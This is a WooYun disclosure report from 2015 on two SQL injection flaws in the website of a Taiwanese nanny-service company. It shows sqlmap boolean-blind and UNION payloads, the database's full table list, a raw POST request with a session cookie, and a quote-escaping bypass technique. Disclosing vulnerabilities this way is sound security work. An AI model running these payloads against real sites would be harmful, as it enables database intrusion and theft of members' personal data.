当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129107

漏洞标题:108保姆银行主站两个SQL注入打包(支持UNION)

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 路人甲

提交时间:2015-07-25 14:37

修复时间:2015-09-10 18:24

公开时间:2015-09-10 18:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-25: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经确认,细节仅向厂商公开
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开

简要描述:

详细说明:

0x01
http://www.108.com.tw/main04/108news/news_detail.php?Id=155

1.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Id=155 AND 1743=1743
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: Id=-4946 UNION ALL SELECT NULL,CONCAT(0x71766a7871,0x4d6d4352664552787947,0x7170786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: com108_site
[46 tables]
+-------------------------------+
| restrict                      |
| admins                        |
| area                          |
| areacode                      |
| banner                        |
| banner1                       |
| banner2                       |
| banner3                       |
| carerestrict                  |
| childminder                   |
| company                       |
| county                        |
| doctor_suggest                |
| epaper                        |
| expert                        |
| job                           |
| ladychild                     |
| languagespeak                 |
| maillist_group                |
| maillist_queue                |
| member_restrict               |
| memberchildminderno           |
| memberno                      |
| members                       |
| members_childminder           |
| members_childminder_appraisal |
| members_childminder_edu       |
| members_childminder_exp       |
| members_childminder_expert    |
| members_childminder_homepage  |
| members_childminder_job_exp   |
| members_childminder_jobnow    |
| members_childminder_photo     |
| message_childminder           |
| message_form_for_childminder  |
| message_form_for_parent       |
| message_members               |
| messages_108_childminder      |
| messages_108_members          |
| news                          |
| news2                         |
| news3                         |
| parent_case                   |
| service                       |
| suggestion                    |
| visitor                       |
+-------------------------------+


0x02

POST /main04/members/members_childminder_add.php HTTP/1.1
Content-Length: 93
Content-Type: application/x-www-form-urlencoded
Referer: http://www.108.com.tw:80/
Cookie: PHPSESSID=768821f907f29944e7d0d258c4c29b5c; admin_spiderpass=32cc5886dc1fa8c106a02056292c4654
Host: www.108.com.tw
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
act=add&identificationcard=1&passwd=g00dPa%24%24w0rD&passwd_comfirm=g00dPa%24%24w0rD

identificationcard 参数

脚本名:unmagicquotes.py  作用:宽字符绕过 GPC addslashes
Input: 1′ AND 1=1 
Output: 1%bf%27 AND 1=1–%20


漏洞证明:

大量会员信息

2.png


11.png

12.png

不深入了~

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-07-27 18:22

厂商回复:

感謝通知!

最新状态:

暂无